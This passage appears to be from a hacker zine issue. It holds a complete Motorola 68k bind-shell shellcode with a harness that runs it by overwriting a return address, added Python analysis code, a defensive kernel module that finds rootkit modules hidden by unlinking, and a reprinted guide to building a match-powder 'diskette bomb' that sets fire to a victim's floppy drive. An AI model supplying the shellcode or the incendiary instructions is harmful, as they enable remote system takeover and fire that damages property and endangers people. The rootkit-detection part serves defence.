            movl %sp,%d1            /* /bin/sh in %d1 */
            eorl %d2,%d2
            movl %d2,%sp@-          /* pea 0x0 */
            pea 0x0130              /* 0030 -> 0130 = kill the zero */
            movl %sp,%d2
            movl %d2,%d3
            trap #0

    /* ---EOF---bindsock shellcode--------------------------------------------- */

    # as bindshell.s -o bindshell.o ; ld bindshell.o -o bindshell
    # ./bindshell &
    [309]
    # telnet localhost 200
    Trying 127.0.01...
    Connected to localhost.
    Escape character is '^]'.
    echo aaaaaaaaaaaa
    aaaaaaaaaaaa
    ctrl+c

That is about all. The code is certainly far from optimised and contains some zero bytes, but I hope it gives the general picture.
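To read a blob like the ones in this section without a disassembler at hand, an analyst can decode just the instruction subset the article uses and log each trap #0 together with the syscall number in %d0. The decoder below is an added example, not the article's code; its function names are my own, its sample inputs are the article's execve and bind-socket byte strings, plus a setuid(0) sequence that I assembled by hand from the snippet in section III and that is labelled as constructed.

```python
"""Recover the trap #0 system-call sequence from a Linux/m68k code blob."""
import struct

SYSCALLS = {11: "execve", 23: "setuid", 63: "dup2", 102: "socketcall"}
SOCKETCALLS = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

# The article's two byte strings, big-endian as listed there.
EXECVE_SHELLCODE = bytes.fromhex(
    "700b 4879 2f2f 7368 4879 2f62 696e 220f b582 2f02 4878 0130 240f 2602 4e40")
BIND_SHELLCODE = bytes.fromhex(
    "7002 2e80 7001 2f40 0004 b180 2f40 0008 240f 7066 7201 4e40"
    "2e80 303c 00c8 2f40 000c b180 2f40 0010 7002 2f40 0014 41ef 000c"
    "2f48 0004 7010 2f40 0008 7066 7202 4e40"
    "7001 2f40 0004 7066 7204 4e40"
    "b180 2f40 0004 2f40 0008 7066 7205 4e40"
    "2200 703f 7400 4e40 2200 703f 7401 4e40 2200 703f 7402 4e40"
    "700b 4879 2f2f 7368 4879 2f62 696e 220f b582 2f02 4878 0130 240f 2602 4e40")
# Constructed sample: the article's setuid(0) snippet assembled by hand
# (eorl %d2,%d2 ; movl %d2,%d1 ; movl #23,%d0 ; trap #0).
SETUID_SAMPLE = bytes.fromhex("b582 2202 203c 0000 0017 4e40")


def _ea_extra(mode, reg, size):
    """Extension bytes an effective-address field adds to an instruction."""
    if mode in (5, 6):                      # d16(An), d8(An,Xn)
        return 2
    if mode == 7:                           # abs.w, abs.l, d16(pc), d8(pc,Xn), #imm
        return {0: 2, 1: 4, 2: 2, 3: 2, 4: size}.get(reg, 0)
    return 0                                # Dn, An, (An), (An)+, -(An)


def decode_syscalls(code):
    """Return [(syscall name, (%d1, %d2, %d3))] for every trap #0 in `code`.

    Only constants loaded by moveq/move #imm, register copies and eor-to-zero
    are tracked; any other value (a syscall result, a stack address) is None.
    Raises ValueError on an opcode outside the subset handled here."""
    d = [None] * 8
    calls = []
    pc = 0
    while pc + 2 <= len(code):
        w = struct.unpack(">H", code[pc:pc + 2])[0]
        length = 2
        if (w & 0xFFF0) == 0x4E40:                          # trap #n
            if (w & 0xF) == 0:
                name = SYSCALLS.get(d[0], "sys_%s" % d[0])
                if d[0] == 102:
                    name += "/" + SOCKETCALLS.get(d[1], "call_%s" % d[1])
                calls.append((name, tuple(d[1:4])))
                d[0] = None                                  # return value unknown
        elif (w & 0xF100) == 0x7000:                        # moveq #imm8,%dn
            imm = w & 0xFF
            d[(w >> 9) & 7] = imm - 256 if imm & 0x80 else imm
        elif (w & 0xF000) in (0x2000, 0x3000):              # move.l / move.w
            size = 4 if (w & 0xF000) == 0x2000 else 2
            src_mode, src_reg = (w >> 3) & 7, w & 7
            dst_mode, dst_reg = (w >> 6) & 7, (w >> 9) & 7
            length += _ea_extra(src_mode, src_reg, size)
            length += _ea_extra(dst_mode, dst_reg, size)
            if pc + length > len(code):
                raise ValueError("instruction at offset %d is truncated" % pc)
            if dst_mode == 0:                                # destination is %dn
                if src_mode == 0:
                    d[dst_reg] = d[src_reg]
                elif src_mode == 7 and src_reg == 4:        # immediate source
                    fmt = ">I" if size == 4 else ">H"
                    d[dst_reg] = struct.unpack(fmt, code[pc + 2:pc + 2 + size])[0]
                else:
                    d[dst_reg] = None                        # e.g. movel %sp,%dn
        elif (w & 0xF1C0) == 0xB180:                        # eor.l %dn,<ea>
            length += _ea_extra((w >> 3) & 7, w & 7, 4)
            if ((w >> 3) & 7) == 0:                         # eor.l %dn,%dm
                n, m = (w >> 9) & 7, w & 7
                d[m] = 0 if n == m else None
        elif (w & 0xFFC0) == 0x4840:                        # pea <ea>
            length += _ea_extra((w >> 3) & 7, w & 7, 4)
        elif (w & 0xF1C0) == 0x41C0:                        # lea <ea>,%an
            length += _ea_extra((w >> 3) & 7, w & 7, 4)
        else:
            raise ValueError("unsupported opcode %#06x at offset %d" % (w, pc))
        if pc + length > len(code):
            raise ValueError("instruction at offset %d is truncated" % pc)
        pc += length
    return calls


def syscall_names(code):
    """Just the names, in order: the one-line summary an analyst wants first."""
    return [name for name, _ in decode_syscalls(code)]
```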
And at last, here is how it should look:

char bind_shellcode[]=
    "\x70\x02"                  /* moveq #2,%d0 */
    "\x2e\x80"                  /* movel %d0,%sp@ */
    "\x70\x01"                  /* moveq #1,%d0 */
    "\x2f\x40\x00\x04"          /* movel %d0,%sp@(4) */
    "\xb1\x80"                  /* eorl %d0,%d0 */
    "\x2f\x40\x00\x08"          /* movel %d0,%sp@(8) */
    "\x24\x0f"                  /* movel %sp,%d2 */
    "\x70\x66"                  /* moveq #102,%d0 */
    "\x72\x01"                  /* moveq #1,%d1 */
    "\x4e\x40"                  /* trap #0 */
    "\x2e\x80"                  /* movel %d0,%sp@ */
    "\x30\x3c\x00\xc8"          /* movew #200,%d0 */
    "\x2f\x40\x00\x0c"          /* movel %d0,%sp@(12) */
    "\xb1\x80"                  /* eorl %d0,%d0 */
    "\x2f\x40\x00\x10"          /* movel %d0,%sp@(16) */
    "\x70\x02"                  /* moveq #2,%d0 */
    "\x2f\x40\x00\x14"          /* movel %d0,%sp@(20) */
    "\x41\xef\x00\x0c"          /* lea %sp@(12),%a0 */
    "\x2f\x48\x00\x04"          /* movel %a0,%sp@(4) */
    "\x70\x10"                  /* moveq #16,%d0 */
    "\x2f\x40\x00\x08"          /* movel %d0,%sp@(8) */
    "\x70\x66"                  /* moveq #102,%d0 */
    "\x72\x02"                  /* moveq #2,%d1 */
    "\x4e\x40"                  /* trap #0 */
    "\x70\x01"                  /* moveq #1,%d0 */
    "\x2f\x40\x00\x04"          /* movel %d0,%sp@(4) */
    "\x70\x66"                  /* moveq #102,%d0 */
    "\x72\x04"                  /* moveq #4,%d1 */
    "\x4e\x40"                  /* trap #0 */
    "\xb1\x80"                  /* eorl %d0,%d0 */
    "\x2f\x40\x00\x04"          /* movel %d0,%sp@(4) */
    "\x2f\x40\x00\x08"          /* movel %d0,%sp@(8) */
    "\x70\x66"                  /* moveq #102,%d0 */
    "\x72\x05"                  /* moveq #5,%d1 */
    "\x4e\x40"                  /* trap #0 */
    "\x22\x00"                  /* movel %d0,%d1 */
    "\x70\x3f"                  /* moveq #63,%d0 */
    "\x74\x00"                  /* moveq #0,%d2 */
    "\x4e\x40"                  /* trap #0 */
    "\x22\x00"                  /* movel %d0,%d1 */
    "\x70\x3f"                  /* moveq #63,%d0 */
    "\x74\x01"                  /* moveq #1,%d2 */
    "\x4e\x40"                  /* trap #0 */
    "\x22\x00"                  /* movel %d0,%d1 */
    "\x70\x3f"                  /* moveq #63,%d0 */
    "\x74\x02"                  /* moveq #2,%d2 */
    "\x4e\x40"                  /* trap #0 */
    "\x70\x0b"                  /* moveq #11,%d0 */
    "\x48\x79\x2f\x2f\x73\x68"  /* pea 2f2f7368 */
    "\x48\x79\x2f\x62\x69\x6e"  /* pea 2f62696e */
    "\x22\x0f"                  /* movel %sp,%d1 */
    "\xb5\x82"                  /* eorl %d2,%d2 */
    "\x2f\x02"                  /* movel %d2,%sp@- */
    "\x48\x78\x01\x30"          /* pea 130 */
    "\x24\x0f"                  /* movel %sp,%d2 */
    "\x26\x02"                  /* movel %d2,%d3 */
    "\x4e\x40";                 /* trap #0 */

main()
{
    int *ret;

    ret = (int *)&ret + 2;          /* overwrite the saved return address */
    *ret = (int)bind_shellcode;     /* cast added: the original assigned the pointer to an int */
}

p.s. as always - sorry for my poor english.

VI. References.

[1] http://e-www.motorola.com/collateral/M68000PRM.pdf - programmer's manual
[2] http://e-www.motorola.com/brdata/PDFDB/docs/MC68060UM.pdf - user's manual
[3] http://www.lsd-pl.net/documents/asmcodes-1.0.2.pdf - good tutorial

|=-----------------------------------------------------------------------=|
|=-=[ 6 - Finding hidden kernel modules (the extrem way) ]=--------------=|
|=-----------------------------------------------------------------------=|

by madsys

1 Introduction
2 The technique of module hiding
3 Countermeasure -- brute force
4 Problem of unmapped
5 Greetings
6 References
7 Code

1 Introduction
==============

This paper presents a method for finding hidden modules on a Linux system. Generally speaking, most attackers hide their modules after taking over the victim, so that the administrator does not notice the change to the kernel. Because modules are linked into a singly linked chain, the original list cannot be recovered once some modules have been unlinked from it, which is why retrieving hidden modules is hard. Basic C skill and some knowledge of the Linux kernel are required.

2 The technique of module hiding
================================

First of all, we examine the most popular and general technique of module hiding, and how an application obtains the list of modules.
An implementation of module hiding is shown below:

----snip----
        struct module *p;

        for (p = &__this_module; p->next; p = p->next) {
                if (strcmp(p->next->name, str))
                        continue;
                p->next = p->next->next;        // <-- here it removes that module
                break;
        }
----snip----

As you can see, to hide one module the unidirectional chain is modified. The following snippet of the sys_create_module() system call shows why the technique works:

----snip----
        spin_lock_irqsave(&modlist_lock, flags);
        mod->next = module_list;
        module_list = mod;      /* link it in */
        spin_unlock_irqrestore(&modlist_lock, flags);
----snip----

The conclusion: a module is linked into the unidirectional chain when it is created. "lsmod" is the Linux application for listing the currently loaded modules; it uses the sys_query_module() system call, and qm_modules() is the function actually called when modules are queried:

static int qm_modules(char *buf, size_t bufsize, size_t *ret)
{
        struct module *mod;
        size_t nmod, space, len;

        nmod = space = 0;

        for (mod = module_list; mod != &kernel_module; mod = mod->next, ++nmod) {
                len = strlen(mod->name) + 1;
                if (len > bufsize)
                        goto calc_space_needed;
                if (copy_to_user(buf, mod->name, len))
                        return -EFAULT;
                buf += len;
                bufsize -= len;
                space += len;
        }

        if (put_user(nmod, ret))
                return -EFAULT;
        else
                return 0;

calc_space_needed:
        space += len;
        while ((mod = mod->next) != &kernel_module)
                space += strlen(mod->name) + 1;

        if (put_user(space, ret))
                return -EFAULT;
        else
                return -ENOSPC;
}

Note: the pointer module_list always points at the head of the singly linked chain. This shows clearly why the hiding technique works: a module that has been unlinked is never reached by this walk.

3 Countermeasure -- brute force
===============================

Given how modules are hidden, brute force might be useful. The relevant part of the sys_create_module() system call is shown below.
--snip--
        if ((mod = (struct module *)module_map(size)) == NULL) {
                error = -ENOMEM;
                goto err1;
        }
--snip--

and the macro module_map in "asm/module.h":

        #define module_map(x)   vmalloc(x)

You should have noticed that the function calls vmalloc() to allocate the module struct. So the size limit of the vmalloc zone can be exploited by brute force to determine which modules are really present on our system. As you know, the vmalloc zone is 128M (on 2.2 and 2.4 kernels; it contains many empty holes), and any allocated module is aligned to 4K. Therefore the theoretical maximum number of candidates we have to check is 128M/4K = 32768.

4 Problem of unmapped
=====================

By now you may think: "umm, it's very easy to use brute force to list those evil modules". But that is not true, for an important reason: the address you are accessing may be unmapped, which causes a page fault and the kernel reports: "Unable to handle kernel paging request at virtual address". So we must make sure the address we are accessing is mapped. The solution is to verify the validity of the corresponding entry in the kernel pgd (swapper_pg_dir) and of the corresponding entry in the page table. Furthermore, we also have to make sure that the content at the address pointed to by the "name" pointer (in struct module) is valid. Because entries 768~1024 of a user process's pgd are kept in sync with the kernel pgd, the hard-coded address of the kernel pgd (0xc0101000) is used. The following function validates those entries in the pgd and page table:

int valid_addr(unsigned long address)
{
        unsigned long page;

        if (!address)
                return 0;

        page = ((unsigned long *)0xc0101000)[address >> 22];    /* pde */
        if (page & 1) {
                page &= PAGE_MASK;
                address &= 0x003ff000;
                page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT];   /* pte */
                if (page)
                        return 1;
        }
        return 0;
}

After validating the addresses we want to check, the next step is easy -- just brute force.
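As an added illustration, not madsys's code: a Python model of the scan described in sections 3 and 4, with a constructed 32-bit RAM, a toy swapper_pg_dir, valid_addr() implemented as the pde/pte walk above, and a hunt() that visits the vmalloc window page by page and returns the names that "lsmod" does not show. VMALLOC_START, the struct field offsets and the fixture modules are constructed values; unmapped pages and a mapped but zero-filled page are included to show that neither causes a bad dereference.

```python
PAGE_SIZE = 4096
VMALLOC_START, SCAN_PAGES = 0xc8000000, 64    # constructed scan window; real values are kernel-specific
SIZE_OFF, NAME_OFF = 4, 8                    # assumed offsets of size/name in this toy struct module
PGD_PA = 0x1000                              # toy swapper_pg_dir; page tables are identity-mapped here
ram = {}                                     # constructed RAM: physical frame number -> bytearray

def frame(pfn): return ram.setdefault(pfn, bytearray(PAGE_SIZE))
def rd32(pa): return int.from_bytes(frame(pa >> 12)[pa & 0xfff:(pa & 0xfff) + 4], "little")
def wr32(pa, v): frame(pa >> 12)[pa & 0xfff:(pa & 0xfff) + 4] = v.to_bytes(4, "little")

def pte_pa(va):
    """Physical address of the pte covering va, or None when the pde is not present."""
    pde = rd32(PGD_PA + 4 * (va >> 22))
    return (pde & ~0xfff) + 4 * ((va & 0x003ff000) >> 12) if pde & 1 else None

def map_page(va, pfn):
    """Install the pde (one page table per 4M slot) and a present pte for va -> pfn."""
    if pte_pa(va) is None:
        wr32(PGD_PA + 4 * (va >> 22), (0x2000 + 0x1000 * (va >> 22)) | 1)
    wr32(pte_pa(va), (pfn << 12) | 1)

def valid_addr(va):
    """module_hunter's test: non-null, present pde, non-zero pte, so a read will not fault."""
    return bool(va) and pte_pa(va) is not None and rd32(pte_pa(va)) != 0

def phys(va):                                # translate a va that valid_addr() accepted
    return (rd32(pte_pa(va)) & ~0xfff) | (va & 0xfff)
def plant_module(va, name, size):
    """Constructed fixture: a toy module struct at va with its name string 0x40 bytes in."""
    map_page(va, va >> 12)
    wr32(phys(va + SIZE_OFF), size)
    wr32(phys(va + NAME_OFF), va + 0x40)
    frame(phys(va) >> 12)[0x40:0x40 + len(name) + 1] = name.encode() + b"\0"

def hunt(visible):
    """Brute-force every page in the window like showmodule_read() and return names lsmod lacks."""
    found = {}
    for va in range(VMALLOC_START, VMALLOC_START + SCAN_PAGES * PAGE_SIZE, PAGE_SIZE):
        if not valid_addr(va + NAME_OFF):     # unmapped page: skip it, never dereference it
            continue
        name_ptr = rd32(phys(va + NAME_OFF))
        if not valid_addr(name_ptr):         # null or garbage name pointer
            continue
        raw = bytes(frame(phys(name_ptr) >> 12)[phys(name_ptr) & 0xfff:]).split(b"\0", 1)[0]
        if raw and 0x21 <= raw[0] <= 0x7e and rd32(phys(va + SIZE_OFF)) < 1 << 20:
            found[raw.decode("ascii", "replace")] = va
    return {n: a for n, a in found.items() if n not in visible}

plant_module(VMALLOC_START + 3 * PAGE_SIZE, "e1000", 0x9000)        # linked: lsmod shows it
plant_module(VMALLOC_START + 17 * PAGE_SIZE, "hidden_mod", 0x3000)  # unlinked from module_list
map_page(VMALLOC_START + 30 * PAGE_SIZE, 0x300)                     # mapped but zero-filled page
```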
As the list of modules, hidden ones included, has now been created, you can compare it with the output of "lsmod". Then you can find the evil modules and get rid of them.

5 Greetings
===========

Shout to uberhax0rs@linuxforum.net

6 Code
======

-----BEGIN MODULE_HUNTER.C-----
/*
 * module_hunter.c: Search for patterns in the kernel address space that
 * look like module structures. This tool finds hidden modules that
 * unlinked themselves from the chained list of loaded modules.
 *
 * This tool is currently implemented as a module but can be easily ported
 * to a userland application (using /dev/kmem).
 *
 * Compile with: gcc -c module_hunter.c -I/usr/src/linux/include
 * insmod ./module_hunter.o
 *
 * usage: cat /proc/showmodules && dmesg
 */

#define MODULE
#define __KERNEL__

/* Header names below are restored (the angle-bracketed names were lost in
 * extraction); they are the usual 2.4 module set and may need adjusting. */
#include <linux/config.h>

#ifdef CONFIG_SMP
#define __SMP__
#endif

#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/vmalloc.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/stat.h>
#include <asm/page.h>
#include <asm/pgtable.h>
#include <asm/uaccess.h>

static int errno;

int valid_addr(unsigned long address)
{
        unsigned long page;

        if (!address)
                return 0;

        page = ((unsigned long *)0xc0101000)[address >> 22];    /* pde */
        if (page & 1) {
                page &= PAGE_MASK;
                address &= 0x003ff000;
                page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT];   /* pte */
                if (page)
                        return 1;
        }
        return 0;
}

ssize_t showmodule_read(struct file *unused_file, char *buffer, size_t len, loff_t *off)
{
        struct module *p;

        printk("address module\n\n");
        /* walk the vmalloc zone one page at a time; every candidate is checked
         * with valid_addr() before it is dereferenced */
        for (p = (struct module *)VMALLOC_START;
             p <= (struct module *)(VMALLOC_START + VMALLOC_RESERVE - PAGE_SIZE);
             p = (struct module *)((unsigned long)p + PAGE_SIZE)) {
                if (valid_addr((unsigned long)p + (unsigned long)&((struct module *)NULL)->name)
                    && valid_addr(*(unsigned long *)((unsigned long)p + (unsigned long)&((struct module *)NULL)->name))
                    && strlen(p->name))
                        if (*p->name >= 0x21 && *p->name <= 0x7e && (p->size < 1 << 20))
                                printk("0x%p%20s size: 0x%x\n", p, p->name, p->size);
        }
        return 0;
}

static struct file_operations showmodules_ops = {
        read: showmodule_read,
};

int init_module(int x)
{
        struct proc_dir_entry *entry;

        entry = create_proc_entry("showmodules", S_IRUSR, &proc_root);
        entry->proc_fops = &showmodules_ops;
        return 0;
}

void cleanup_module()
{
        remove_proc_entry("showmodules", &proc_root);
}

MODULE_LICENSE("GPL");
MODULE_AUTHOR("madsysercist.iscas.ac.cn");
-----END MODULE-HUNTER.C-----

|=-----------------------------------------------------------------------=|
|=-=[ 7 - Good old floppy bombs ]=---------------------------------------=|
|=-----------------------------------------------------------------------=|

[ Note by the editors: We felt like it's time for a re-print of some
  already forgotten fun with pyro techniques. Enjoy. ]

####################################
#    How To Make A Diskette Bomb   #
#        by Phrick-A-Phrack        #
####################################

Before I even start I want to make it clear that I do NOT take any responsibility for the use of the information in this document.

This little baby is good to use to stuff up someone's computer a little. It can be adapted to a range of other things.

You will need:

- A disk (3.5" floppies are a good disk to use)
- Scissors
- White or blue kitchen matches (I have not found any other colors that work - I'm not sure why)
- Clear nail polish

What to do:

- Carefully open up the diskette
- Remove the cotton covering from the inside.
- Scrape a lot of match powder into a bowl (use a wooden scraper as metal might spark and ignite the match powder)
- After you have a lot, spread it EVENLY on the disk.
- Spread nail polish over the match powder on the disk.
- Let it dry.
- Carefully put the diskette back together and use the nail polish to seal it shut.

How to use it:

Give it to someone you want to give a fright and stuff up their computer a little. Tell them it's got something they are interested in on it. When they put it in their drive the drive head attempts to read the disk which causes a small fire - enough heat to melt the disk drive and stuff the head up!

^^Phrick-A-Phrack^^

|=[ EOF ]=---------------------------------------------------------------=|